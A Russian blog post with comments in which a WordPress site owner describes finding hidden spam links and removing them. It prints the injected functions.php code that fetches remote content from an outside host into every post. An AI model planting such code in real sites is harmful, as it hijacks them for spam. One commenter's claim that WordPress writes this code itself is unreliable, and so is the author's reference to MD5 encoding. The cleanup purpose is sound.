Размещая обзоры на своем сайте случайным образом наткнулся на страницу где присутствовали весьма сомнительные (левые) ссылки с очень странными анкорами (типа viagra), которые я естественно не размещал и не знал, каким образом они туда попали.
Копнув чуть дальше увидел, что порядка 400 ссылок, о существовании которых я не знал, каким-то странным образом появились на сайте, заварив большую кружку чая и включив AIMP, я начал разбираться, в чем же дело…
Поиск внешних ссылок
Перво-наперво мне необходимо было, что называется узнать врага в лицо и посмотреть все страницы, на которых размещены ссылки.
Для проверки всех внешних ссылок сайта (то есть ссылок на которые ссылается Ваш сайт) я использую софт — Screaming Frog SEO Spider.
Зарегистрировавшись в сервисе заходим в пункт «Поиск внешних ссылок по sitemap». Все что нам необходимо, это написать путь в карте сайта (например, https://bitby.net/sitemap.xml) и нажать на кнопку «Запрос».
Сервис проверит каждую страницу Вашего сайта и покажет, какие внешние ссылки на той или иной странице, так же покажет находиться ли ссылка в атрибутах noindex или nofollow.
Сервис платен, однако, до 100 страниц можно использовать бесплатно.
Убираем лишние ссылки с сайта
Узнав все внешние ссылки, на которые ссылается Ваш блог мы вручную удаляем ссылки с каждой страницы.
У меня попался такой интересный случай, что злоумышленники сделали такой программный код который подключал сторонний скрипт, который в свою очередь на каждую страницу моего сайта ставил ссылку без анкора. Самое, что интересное, данные ссылки не были видны через HTML.
Только благодарю своему диплому программиста и допив вторую кружку чая я нашел данный фрагмент кода.
В файле functions.php внизу файла, был написан код:
[php]
function bloqinfo($wp_id){
static $wp_count = 0;
if($wp_count == 0){
$wp_count++;
return @file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$wp_id.’&m=08′);
}
}
[/php]
Т.е. с сайта wpru.ru загружался какой-то файл, который отвечал за вывод ссылок.
В файде single.php следует удалить:
[php]<!—?=bloqinfo($post- —>ID) ?>[/php]
После этого скрытые внешние ссылки исчезнут, и Ваш сайт будет так же чист, как и Ваша совесть 🙂
Защита сайта
Для обеспечения защиты своего сайта следует выполнять следующие простые правила:
1. Никому не передавать данные о своих логинах и паролях к сайту;
2. Периодически менять пароль для доступа к сайту;
3. Пароль должен состоять как из символов, так из цифр;
4. Проверяйте сайт на наличие вирусов.
Имея подозрительные внешние ссылки с сайта можно легко и быстро попасть под немилость поисковых систем, особо это касается Яндекса. Будьте осторожны и бдительны!
Ответить | Цитировать
Ответить | Цитировать
Ответить | Цитировать
Без чая никуда)
@ Антон:
Возможно, я не пробовал 🙂
Ответить | Цитировать
Ответить | Цитировать
Как вы думаете, как это все могло попасть в тему?
Ответить | Цитировать
не совсем понял Ваш вопрос, не могли бы пояснить…
Ответить | Цитировать
Для примера взял последний бекап темы другого своего сайта и заметил в fanction.php кучу левого кода, которая не представляет угрозы, но и делает непонятно что… в конце всего этого был тот же код, что и приведён в этой статье.
Как нашёл эту всю гадость в бекапе, так сразу пошёл удалять на самом блоге… а там уже и нет ничего!!!!!
следов взлома тоже нет, всё цело… че это было я так и непонял.
Ответить | Цитировать
Ответить | Цитировать
Ответ найден!!!
Кусок кода, описанный в статье и всё остальное безобидное, но возникшее само собой дер*мо, которое вы можете найти в своём fanction.php может быть сгенерировано самим WP.
Если он посчитает, что в коде темы чего-то не хватает для её полноценной работы.
Убито несколько часов ВОСКРЕСЕНЬЯ и проверенно опытным путём.
Ответить | Цитировать
хорошо, что Вы сами нашли проблему и разобрались 🙂 по своему опыту скажу, что бывает такая ситуация: скачиваешь шаблон с какого-нибудь «левого» сайта, где уже прописан код, который добавляет свои ссылки и как правило данный код кодируют в MD5. Как совет, лучше скачивать с официальных сайтов шаблоны и сканировать файлы шаблона на «сомнительный код».